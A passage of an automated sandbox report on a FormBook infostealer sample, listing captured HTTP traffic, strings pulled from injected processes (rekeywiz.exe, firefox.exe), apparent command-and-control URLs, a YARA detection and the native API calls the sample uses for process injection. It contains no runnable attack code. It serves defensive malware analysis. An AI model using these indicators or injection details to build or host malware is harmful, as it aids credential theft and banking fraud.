20 30 20 32 35 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 32 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 32 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 00:32:24 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nCSYn%2FzaHXYstB0TCBR8AutBnXelbtowJc5H1ypwsd7mrAJQbb9DMJbmJtqdc6TfVfNT1vkIdJrM7BJ0jEVwjLDQP3nwnXFkAiOhul%2Ffzy%2Bv7q6KW9OWrne5FQ7tzxps6q%2Fwp8B4QCJ9"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91e6f4584c5442c0-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1737&min_rtt=1737&rtt_var=868&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=811&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b 03 31 14 84 ef f9 15 cf de dd b7 95 1e 3c 3c 02 da dd 62 61 ad 8b a6 07 8f d1 bc 92 42 9b c4 e4 d5 e0 bf 97 dd 22 78 9d f9 66 98 a1 9b ee 65 6d de c7 1e 9e cc f3 00 e3 fe 71 d8 ae 61 71 8b b8 ed cd 06 b1 33 dd d5 b9 6b 5a c4 7e b7 d0 8a bc 9c 4f 9a 3c 5b a7 15 c9 51 4e ac 57 ed 0a 76 51 60 13 2f c1 11 5e 45 45 38 43 f4 11 dd cf 94 5b ea 7f 8c 5f 6a 45 49 1b cf 90 f9 eb c2 45 d8 c1 fe 75 80 6a 0b 84 28 70 98 38 88 01 c4 1f 0b 14 ce df 9c 1b c2 34 35 65 ad c8 3a 97 b9 14 fd 90 ec a7 67 78 9b 01 b0 02 b5 d6 26 70 b5 41 7c 4c 9c 4b 6c 8a 8f 09 c6 98 05 ee 5b c2 bf a0 22 9c 97 11 ce 8f 7e 01 00 00 ff ff e3 02 00 fa 01 eb 10 0c 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e3LAK1<<baB"xfemqaq3kZ~O<[QNWvQ`/^EE8C[_jEIEuj(p845e:gx&pA|LKl["~0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 00:32:27 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M0J9nIfK%2BEUW9ij%2Fb3LyDlv0QInZJlZ%2F1%2BE0KKejAQ2M5wZ6ITVa3924MCoV8%2F72i8i3s98gnk45RxYhYn1otcr94tNv9h58Zg%2Fa4ymZDBl622v3vX%2BtjnNPlJsHXmIDiWKltRZUfCV3"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91e6f4682e504363-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1669&min_rtt=1669&rtt_var=834&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=835&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b 03 31 14 84 ef f9 15 cf de dd b7 95 1e 3c 3c 02 da dd 62 61 ad 8b a6 07 8f d1 bc 92 42 9b c4 e4 d5 e0 bf 97 dd 22 78 9d f9 66 98 a1 9b ee 65 6d de c7 1e 9e cc f3 00 e3 fe 71 d8 ae 61 71 8b b8 ed cd 06 b1 33 dd d5 b9 6b 5a c4 7e b7 d0 8a bc 9c 4f 9a 3c 5b a7 15 c9 51 4e ac 57 ed 0a 76 51 60 13 2f c1 11 5e 45 45 38 43 f4 11 dd cf 94 5b ea 7f 8c 5f 6a 45 49 1b cf 90 f9 eb c2 45 d8 c1 fe 75 80 6a 0b 84 28 70 98 38 88 01 c4 1f 0b 14 ce df 9c 1b c2 34 35 65 ad c8 3a 97 b9 14 fd 90 ec a7 67 78 9b 01 b0 02 b5 d6 26 70 b5 41 7c 4c 9c 4b 6c 8a 8f 09 c6 98 05 ee 5b c2 bf a0 22 9c 97 11 ce 8f 7e 01 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 fa 01 eb 10 0c 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: d8LAK1<<baB"xfemqaq3kZ~O<[QNWvQ`/^EE8C[_jEIEuj(p845e:gx&pA|LKl["~b0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 00:32:29 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rr6ku%2BGAqOxzsMod9bhgTZ01ETsdtrgOApEXzRdtocehGI7AEdDdbePIaNoGEhN8v%2BiPlEG1qRDiicfIBWzyi%2BavQqmjZ7htUB%2BFyS5NA0s%2BTQ11s8hnIByfXUXnC7T9WsqoQVUXwuce"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91e6f4785b00c32e-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1663&min_rtt=1663&rtt_var=831&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=995&delivery_rate=0&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b 03 31 14 84 ef f9 15 cf de dd b7 95 1e 3c 3c 02 da dd 62 61 ad 8b a6 07 8f d1 bc 92 42 9b c4 e4 d5 e0 bf 97 dd 22 78 9d f9 66 98 a1 9b ee 65 6d de c7 1e 9e cc f3 00 e3 fe 71 d8 ae 61 71 8b b8 ed cd 06 b1 33 dd d5 b9 6b 5a c4 7e b7 d0 8a bc 9c 4f 9a 3c 5b a7 15 c9 51 4e ac 57 ed 0a 76 51 60 13 2f c1 11 5e 45 45 38 43 f4 11 dd cf 94 5b ea 7f 8c 5f 6a 45 49 1b cf 90 f9 eb c2 45 d8 c1 fe 75 80 6a 0b 84 28 70 98 38 88 01 c4 1f 0b 14 ce df 9c 1b c2 34 35 65 ad c8 3a 97 b9 14 fd 90 ec a7 67 78 9b 01 b0 02 b5 d6 26 70 b5 41 7c 4c 9c 4b 6c 8a 8f 09 c6 98 05 ee 5b c2 bf a0 22 9c 97 11 ce 8f 7e 01 00 00 ff ff e3 02 00 fa 01 eb 10 0c 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e3LAK1<<baB"xfemqaq3kZ~O<[QNWvQ`/^EE8C[_jEIEuj(p845e:gx&pA|LKl["~0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 00:32:32 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Si9dzyANvoZlG2SOPO0S%2BUjJHffs%2BZTlvkRRelF86X3uWil2fTefzXqfvocuZF1k14vmOkF%2BI61Rz08mmdrYmFKpoBQzb7nqoAGk%2FUtFoIEbudydv9yuau10DixnNznB%2BNr2U4D8n%2F4n"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91e6f4882b0b1a48-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1936&min_rtt=1936&rtt_var=968&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=535&delivery_rate=0&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 30 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 65 77 61 6e 74 68 6f 70 65 72 73 6f 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 10c<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.newanthoperso.shop Port 80</address></body></html>0
                Source: rekeywiz.exe, 00000007.00000002.3337814954.0000000005194000.00000004.10000000.00040000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000002.3336181471.0000000002E34000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1613513360.000000002C7B4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: rekeywiz.exe, 00000007.00000002.3337814954.0000000004DAC000.00000004.10000000.00040000.00000000.sdmp, rekeywiz.exe, 00000007.00000002.3336035645.0000000004435000.00000004.00000020.00020000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000000.1389196062.0000000002A4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1613513360.000000002C3CC000.00000004.80000000.00040000.00000000.sdmp, hh01FRs81x.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: rekeywiz.exe, 00000007.00000002.3337814954.0000000004DAC000.00000004.10000000.00040000.00000000.sdmp, rekeywiz.exe, 00000007.00000002.3336035645.0000000004435000.00000004.00000020.00020000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000000.1389196062.0000000002A4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1613513360.000000002C3CC000.00000004.80000000.00040000.00000000.sdmp, hh01FRs81x.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                Source: rekeywiz.exe, 00000007.00000002.3337814954.0000000004DAC000.00000004.10000000.00040000.00000000.sdmp, rekeywiz.exe, 00000007.00000002.3336035645.0000000004435000.00000004.00000020.00020000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000000.1389196062.0000000002A4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1613513360.000000002C3CC000.00000004.80000000.00040000.00000000.sdmp, hh01FRs81x.exeString found in binary or memory: http://ocsp.comodoca.com0
                Source: Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000002.3338322375.0000000004EF5000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.trustai.chat
                Source: Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000002.3338322375.0000000004EF5000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.trustai.chat/kv4n/
                Source: rekeywiz.exe, 00000007.00000002.3340337081.0000000007A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                Source: rekeywiz.exe, 00000007.00000002.3340337081.0000000007A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: rekeywiz.exe, 00000007.00000002.3340337081.0000000007A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: rekeywiz.exe, 00000007.00000002.3340337081.0000000007A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: rekeywiz.exe, 00000007.00000002.3337814954.00000000054B8000.00000004.10000000.00040000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000002.3336181471.0000000003158000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://companies.rbc.ru/
                Source: rekeywiz.exe, 00000007.00000002.3340337081.0000000007A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                Source: rekeywiz.exe, 00000007.00000002.3340337081.0000000007A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: rekeywiz.exe, 00000007.00000002.3340337081.0000000007A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                Source: rekeywiz.exe, 00000007.00000002.3340337081.0000000007A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: rekeywiz.exe, 00000007.00000002.3337814954.00000000054B8000.00000004.10000000.00040000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000002.3336181471.0000000003158000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
                Source: rekeywiz.exe, 00000007.00000002.3334449717.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: rekeywiz.exe, 00000007.00000002.3334449717.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: rekeywiz.exe, 00000007.00000003.1503024681.0000000007A62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: rekeywiz.exe, 00000007.00000002.3334449717.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: rekeywiz.exe, 00000007.00000002.3334449717.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: rekeywiz.exe, 00000007.00000002.3334449717.0000000000804000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: rekeywiz.exe, 00000007.00000002.3334449717.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: rekeywiz.exe, 00000007.00000002.3334449717.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: rekeywiz.exe, 00000007.00000002.3337814954.00000000054B8000.00000004.10000000.00040000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000002.3336181471.0000000003158000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.maplez.online&rand=
                Source: rekeywiz.exe, 00000007.00000002.3337814954.00000000054B8000.00000004.10000000.00040000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000002.3336181471.0000000003158000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
                Source: rekeywiz.exe, 00000007.00000002.3337814954.0000000004DAC000.00000004.10000000.00040000.00000000.sdmp, rekeywiz.exe, 00000007.00000002.3336035645.0000000004435000.00000004.00000020.00020000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000000.1389196062.0000000002A4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1613513360.000000002C3CC000.00000004.80000000.00040000.00000000.sdmp, hh01FRs81x.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                Source: rekeywiz.exe, 00000007.00000002.3340337081.0000000007A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20Y&
                Source: rekeywiz.exe, 00000007.00000002.3337814954.0000000006148000.00000004.10000000.00040000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000002.3336181471.0000000003DE8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: rekeywiz.exe, 00000007.00000002.3340337081.0000000007A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp
                Source: rekeywiz.exe, 00000007.00000002.3337814954.00000000054B8000.00000004.10000000.00040000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000002.3336181471.0000000003158000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.rbc.ru/technology_and_media/
                Source: rekeywiz.exe, 00000007.00000002.3337814954.00000000054B8000.00000004.10000000.00040000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000002.3336181471.0000000003158000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.maplez.online&utm_medium=parking&utm_campaign=s_land_se
                Source: rekeywiz.exe, 00000007.00000002.3337814954.00000000054B8000.00000004.10000000.00040000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000002.3336181471.0000000003158000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.maplez.online&utm_medium=parking&utm_campaign=s_land_n
                Source: rekeywiz.exe, 00000007.00000002.3337814954.00000000054B8000.00000004.10000000.00040000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000002.3336181471.0000000003158000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.maplez.online&utm_medium=parking&utm_campaign=s_land_host
                Source: rekeywiz.exe, 00000007.00000002.3337814954.00000000054B8000.00000004.10000000.00040000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000002.3336181471.0000000003158000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/sozdanie-saita/
                Source: rekeywiz.exe, 00000007.00000002.3337814954.00000000054B8000.00000004.10000000.00040000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000002.3336181471.0000000003158000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.maplez.online&amp;reg_source=parking_auto
                Source: Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000002.3336181471.000000000429E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.strato.de

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.hh01FRs81x.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.hh01FRs81x.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1315969342.00000000015E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1315269021.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3336185788.0000000004540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3338322375.0000000004E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3336234747.0000000004590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3334175533.00000000006D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1317262087.0000000002480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3336041844.0000000003320000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0042CB43 NtClose,4_2_0042CB43
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2B60 NtClose,LdrInitializeThunk,4_2_016A2B60
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_016A2DF0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_016A2C70
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A35C0 NtCreateMutant,LdrInitializeThunk,4_2_016A35C0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A4340 NtSetContextThread,4_2_016A4340
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A4650 NtSuspendThread,4_2_016A4650
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2BE0 NtQueryValueKey,4_2_016A2BE0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2BF0 NtAllocateVirtualMemory,4_2_016A2BF0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2BA0 NtEnumerateValueKey,4_2_016A2BA0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2B80 NtQueryInformationFile,4_2_016A2B80
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2AF0 NtWriteFile,4_2_016A2AF0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2AD0 NtReadFile,4_2_016A2AD0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2AB0 NtWaitForSingleObject,4_2_016A2AB0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2D30 NtUnmapViewOfSection,4_2_016A2D30
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2D00 NtSetInformationFile,4_2_016A2D00
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2D10 NtMapViewOfSection,4_2_016A2D10
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2DD0 NtDelayExecution,4_2_016A2DD0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2DB0 NtEnumerateKey,4_2_016A2DB0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2C60 NtCreateKey,4_2_016A2C60
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2C00 NtQueryInformationProcess,4_2_016A2C00
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2CF0 NtOpenProcess,4_2_016A2CF0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2CC0 NtQueryVirtualMemory,4_2_016A2CC0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2CA0 NtQueryInformationToken,4_2_016A2CA0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2F60 NtCreateProcessEx,4_2_016A2F60
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2F30 NtCreateSection,4_2_016A2F30
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2FE0 NtCreateFile,4_2_016A2FE0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2FA0 NtQuerySection,4_2_016A2FA0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2FB0 NtResumeThread,4_2_016A2FB0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2F90 NtProtectVirtualMemory,4_2_016A2F90
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2E30 NtWriteVirtualMemory,4_2_016A2E30
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2EE0 NtQueueApcThread,4_2_016A2EE0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2EA0 NtAdjustPrivilegesToken,4_2_016A2EA0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2E80 NtReadVirtualMemory,4_2_016A2E80
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A3010 NtOpenDirectoryObject,4_2_016A3010
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A3090 NtSetValueKey,4_2_016A3090
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A39B0 NtGetContextThread,4_2_016A39B0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A3D70 NtOpenThread,4_2_016A3D70
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A3D10 NtOpenProcessToken,4_2_016A3D10
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04704650 NtSuspendThread,LdrInitializeThunk,7_2_04704650
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04704340 NtSetContextThread,LdrInitializeThunk,7_2_04704340
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_04702C70
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702C60 NtCreateKey,LdrInitializeThunk,7_2_04702C60
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_04702CA0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_04702D30
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702D10 NtMapViewOfSection,LdrInitializeThunk,7_2_04702D10
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_04702DF0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702DD0 NtDelayExecution,LdrInitializeThunk,7_2_04702DD0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702EE0 NtQueueApcThread,LdrInitializeThunk,7_2_04702EE0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_04702E80
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702F30 NtCreateSection,LdrInitializeThunk,7_2_04702F30
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702FE0 NtCreateFile,LdrInitializeThunk,7_2_04702FE0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702FB0 NtResumeThread,LdrInitializeThunk,7_2_04702FB0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702AF0 NtWriteFile,LdrInitializeThunk,7_2_04702AF0
